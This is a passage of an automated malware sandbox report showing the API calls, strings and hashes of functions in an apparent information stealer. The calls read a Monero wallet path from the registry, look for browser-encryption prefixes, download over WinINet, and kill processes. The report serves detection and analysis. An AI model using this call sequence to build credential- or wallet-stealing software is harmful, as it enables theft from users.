                            • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 008E1159
                            • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 008E1173
                            • RegCloseKey.ADVAPI32(?), ref: 008E117D
                            Strings
                            • SOFTWARE\monero-project\monero-core, xrefs: 008E114F
                            • wallet_path, xrefs: 008E116D
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                            • API String ID: 3225020163-4244082812
                            • Opcode ID: c07d011bbfc43d418473e30d27caf8a731198fe3f3ece461b80bf936883d5939
                            • Instruction ID: c97991adc3831d270f3ea0d3af62ccdf3a989130b945405345ff2fc8e938d12d
                            • Opcode Fuzzy Hash: c07d011bbfc43d418473e30d27caf8a731198fe3f3ece461b80bf936883d5939
                            • Instruction Fuzzy Hash: 7BF03A75B40348BBEB109BA1AC4EFEB7B7CEB49B55F104154FF05E3280EAB05A4487A1
                            Function 008E9DE0 Relevance: 12.2, APIs: 5, Strings: 3, Instructions: 183memorystringCOMMON
                            Download Yara Rule
                            APIs
                            • memcmp.MSVCRT(?,v20,00000003), ref: 008E9E04
                            • memcmp.MSVCRT(?,v10,00000003), ref: 008E9E42
                            • LocalAlloc.KERNEL32(00000040), ref: 008E9EA7
                              • Part of subcall function 009073F0: lstrcpy.KERNEL32(00000000,ERROR), ref: 0090740E
                            • lstrcpy.KERNEL32(00000000,00914C4C), ref: 008E9FB2
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpymemcmp$AllocLocal
                            • String ID: @$v10$v20
                            • API String ID: 102826412-278772428
                            • Opcode ID: 528e234e43748df755fa9f58625d161b1ca2676ed0e95b35a2b99f26cb2a1726
                            • Instruction ID: 5ab95cbbdb477a358152b5d3269def89b4b30d6acc4de6a31543256b75901bb4
                            • Opcode Fuzzy Hash: 528e234e43748df755fa9f58625d161b1ca2676ed0e95b35a2b99f26cb2a1726
                            • Instruction Fuzzy Hash: 9751D232A10299ABCB10EFAADC41BDE77A8FF46314F054024F949EB251DBB0ED018BD1
                            Function 008E5640 Relevance: 12.1, APIs: 8, Instructions: 112networkmemoryfileCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 008E565A
                            • RtlAllocateHeap.NTDLL(00000000), ref: 008E5661
                            • InternetOpenA.WININET(0090CFF4,00000000,00000000,00000000,00000000), ref: 008E5677
                            • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 008E5692
                            • InternetReadFile.WININET(?,?,00000400,00000001), ref: 008E56BC
                            • memcpy.MSVCRT(00000000,?,00000001), ref: 008E56E1
                            • InternetCloseHandle.WININET(?), ref: 008E56FA
                            • InternetCloseHandle.WININET(00000000), ref: 008E5701
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                            • String ID:
                            • API String ID: 1008454911-0
                            • Opcode ID: 616afd99f8e79d3cb24471674179ff97982e4b2a65e984fc77218c1c66e1ce20
                            • Instruction ID: f29d091ebe42c6093e5dbe9a0afcd13b79ee4c2c1dfbce6490dba5f3360c8c72
                            • Opcode Fuzzy Hash: 616afd99f8e79d3cb24471674179ff97982e4b2a65e984fc77218c1c66e1ce20
                            • Instruction Fuzzy Hash: 66419170A00245EFDB14CF56DC88F9AB7B4FF49705F54C069E918DB2A1DB719942CB90
                            Function 00904950 Relevance: 12.1, APIs: 8, Instructions: 52processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00904969
                            • Process32First.KERNEL32(00000000,00000128), ref: 00904979
                            • Process32Next.KERNEL32(00000000,00000128), ref: 0090498B
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009049AC
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 009049BB
                            • CloseHandle.KERNEL32(00000000), ref: 009049C2
                            • Process32Next.KERNEL32(00000000,00000128), ref: 009049D0
                            • CloseHandle.KERNEL32(00000000), ref: 009049DB
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                            • String ID:
                            • API String ID: 3836391474-0
                            • Opcode ID: 2183aeae932bdc213550c95d485e9e52394ed17e3f8d3fb5d2a3cab5b67261f3
                            • Instruction ID: 14fdd9cefa5550aff8578928a819e978db1fda52ca8eebd7bfab52ddb27fb829
                            • Opcode Fuzzy Hash: 2183aeae932bdc213550c95d485e9e52394ed17e3f8d3fb5d2a3cab5b67261f3
                            • Instruction Fuzzy Hash: 9D01B5B16412146FE7215B609C8DFEB77BCEB08B51F404591FA09D21C1DF70DE908AA5
                            Function 008EE2FD Relevance: 10.9, APIs: 7, Instructions: 441stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 008EE6C5
                            • lstrcpy.KERNEL32(00000000,?), ref: 008EE6EE
                            • lstrcpy.KERNEL32(00000000,?), ref: 008EE727
                            • lstrcpy.KERNEL32(00000000,?), ref: 008EE74D
                            • lstrcpy.KERNEL32(00000000,?), ref: 008EE784
                            • FindNextFileA.KERNEL32(00000000,?), ref: 008EE7BA
                            • FindClose.KERNEL32(00000000), ref: 008EE7C9
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E1557
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E1579
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E159B
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E15FF
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$CloseFileNext
                            • String ID:
                            • API String ID: 1875835556-0
                            • Opcode ID: 74f54192e5d310cad22868fc6fd6330b317a2cadbfc5e3f0390adbb8c5ea6dc2
                            • Instruction ID: 761e99f49c55bcffe0cb0aa0d0a61b73297cc130db596d998a364554bb34dde2
                            • Opcode Fuzzy Hash: 74f54192e5d310cad22868fc6fd6330b317a2cadbfc5e3f0390adbb8c5ea6dc2
                            • Instruction Fuzzy Hash: 37023B70A012959FDB68CF1AC594B65BBE1FF46714B19C0ADD809DB3A2DB72DC82CB40
                            Function 008EE3AA Relevance: 10.9, APIs: 7, Instructions: 441stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 008EE6C5
                            • lstrcpy.KERNEL32(00000000,?), ref: 008EE6EE
                            • lstrcpy.KERNEL32(00000000,?), ref: 008EE727
                            • lstrcpy.KERNEL32(00000000,?), ref: 008EE74D
                            • lstrcpy.KERNEL32(00000000,?), ref: 008EE784
                            • FindNextFileA.KERNEL32(00000000,?), ref: 008EE7BA
                            • FindClose.KERNEL32(00000000), ref: 008EE7C9
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E1557
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E1579
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E159B
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E15FF
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$CloseFileNext
                            • String ID:
                            • API String ID: 1875835556-0
                            • Opcode ID: 74f54192e5d310cad22868fc6fd6330b317a2cadbfc5e3f0390adbb8c5ea6dc2
                            • Instruction ID: 761e99f49c55bcffe0cb0aa0d0a61b73297cc130db596d998a364554bb34dde2
                            • Opcode Fuzzy Hash: 74f54192e5d310cad22868fc6fd6330b317a2cadbfc5e3f0390adbb8c5ea6dc2
                            • Instruction Fuzzy Hash: 37023B70A012959FDB68CF1AC594B65BBE1FF46714B19C0ADD809DB3A2DB72DC82CB40
                            Function 008EE363 Relevance: 10.9, APIs: 7, Instructions: 441stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 008EE6C5
                            • lstrcpy.KERNEL32(00000000,?), ref: 008EE6EE
                            • lstrcpy.KERNEL32(00000000,?), ref: 008EE727
                            • lstrcpy.KERNEL32(00000000,?), ref: 008EE74D
                            • lstrcpy.KERNEL32(00000000,?), ref: 008EE784
                            • FindNextFileA.KERNEL32(00000000,?), ref: 008EE7BA
                            • FindClose.KERNEL32(00000000), ref: 008EE7C9
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E1557
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E1579
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E159B
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E15FF
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$CloseFileNext
                            • String ID:
                            • API String ID: 1875835556-0
                            • Opcode ID: 74f54192e5d310cad22868fc6fd6330b317a2cadbfc5e3f0390adbb8c5ea6dc2
                            • Instruction ID: 761e99f49c55bcffe0cb0aa0d0a61b73297cc130db596d998a364554bb34dde2
                            • Opcode Fuzzy Hash: 74f54192e5d310cad22868fc6fd6330b317a2cadbfc5e3f0390adbb8c5ea6dc2
                            • Instruction Fuzzy Hash: 37023B70A012959FDB68CF1AC594B65BBE1FF46714B19C0ADD809DB3A2DB72DC82CB40
                            Function 008F8520 Relevance: 10.6, APIs: 7, Instructions: 147stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 008F8575
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F85AC
                            • lstrlen.KERNEL32(00000000), ref: 008F85F2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F8629
                            • lstrlen.KERNEL32(00000000), ref: 008F863F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F866E
                            • StrCmpCA.SHLWAPI(00000000,00911C80), ref: 008F867E
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 25a00b2b02eb2107b26e1564d4d97e1910188360bfd4842cbb433e3eeff73b06
                            • Instruction ID: 47dd5d3447909cfbea3f2d829ada5f6a50400e1d7f4f52d0e9fb3d50d52f4e77
                            • Opcode Fuzzy Hash: 25a00b2b02eb2107b26e1564d4d97e1910188360bfd4842cbb433e3eeff73b06
                            • Instruction Fuzzy Hash: 71517C7590020ADBDB20DF78D988AABBBB9FF59304B248459EC86DB245EF34D9418B50
                            Function 00902AE0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00902AF5
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00902AFC
                            • RegOpenKeyExA.ADVAPI32(80000002,012EBBE8,00000000,00020119,00902A79), ref: 00902B1B
                            • RegQueryValueExA.ADVAPI32(00902A79,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00902B35
                            • RegCloseKey.ADVAPI32(00902A79), ref: 00902B3F
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: CurrentBuildNumber
                            • API String ID: 3225020163-1022791448
                            • Opcode ID: 5fa500c5e34a7cae498cb732061363c507390b3b1035caec37b2bdb632c813fb
                            • Instruction ID: cae5d885408e0813538709698b4733071d77daad9fa0c6b03ec535024abee5f9
                            • Opcode Fuzzy Hash: 5fa500c5e34a7cae498cb732061363c507390b3b1035caec37b2bdb632c813fb
                            • Instruction Fuzzy Hash: 4501B175A00258AFD310DBA4DC5DFEB7BBCEB49B05F204098FE49D7280EA315A058790
                            Function 00902A50 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47registrymemoryCOMMON
